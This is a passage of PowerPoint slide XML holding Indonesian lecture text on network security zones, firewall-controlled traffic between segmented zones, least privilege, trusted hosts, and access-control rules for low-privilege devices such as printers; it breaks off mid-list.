              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona-zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Lalu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firewall. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> arti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>bawah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tunduk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> antivirus, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagainya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keluar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>satu-satunya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> point yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> router, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> point </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>nirkabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Diagram </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengilustrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host di zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> printer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host lain. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di LAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di zona yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
